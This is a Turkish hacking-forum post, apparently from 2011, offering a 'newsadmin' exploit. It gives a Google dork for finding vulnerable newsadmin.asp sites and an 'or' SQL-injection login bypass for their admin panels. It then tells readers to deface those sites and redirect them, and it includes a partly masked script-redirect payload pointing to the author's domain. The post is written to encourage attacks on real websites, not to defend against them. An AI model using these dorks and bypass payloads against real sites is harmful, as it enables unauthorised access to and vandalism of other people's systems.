İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

newsadmin açığı

23-11-2011 16:08
#1
berkay88 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2010
Nereden:
İstanbul
Mesajlar:
627
Teşekkür (Etti):
95
Teşekkür (Aldı):
142
Konular:
195
Ticaret:
(0) %
# Exploit Title: adminnews
# Google Dork: allinurl:newsadmin.asp
# Date: [10.11.2011]
# Geliştiren:cihan6776
#Yönlendirme:


Kod:
******************="http://cihan6776.tr.cx"</script>
(düzenleyin)
# Anlatım:
dork:allinurl:newsadmin.asp

bunun herhangi bir arama motorunda taratıyoruz gelen sitelere giriyoruz. Tıklayınca zaten genelde direk admin bölümü gelir oldu ki sizden giriş istedi o zaman bypass yapın


Kod:
username='or'
password='or'
düzenleme yerine giriyoruz eğer ki bilmediğiniz bir dilde gelirse google den çevirin siteyi


bazı siteler için anasayfaya gider imzanız ama hepssinde böyle olmaz mesela haber bölümüne gidebilir

size tavsiyem sitelere **** atın yani siteyi yönlendirin

eğer takıldığınız bir nokta olursa konnu altına yazarsınız


Not:Cihan67 Alıntıdır
Kullanıcı İmzası
Bana Soru SorcaksanTıkla



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı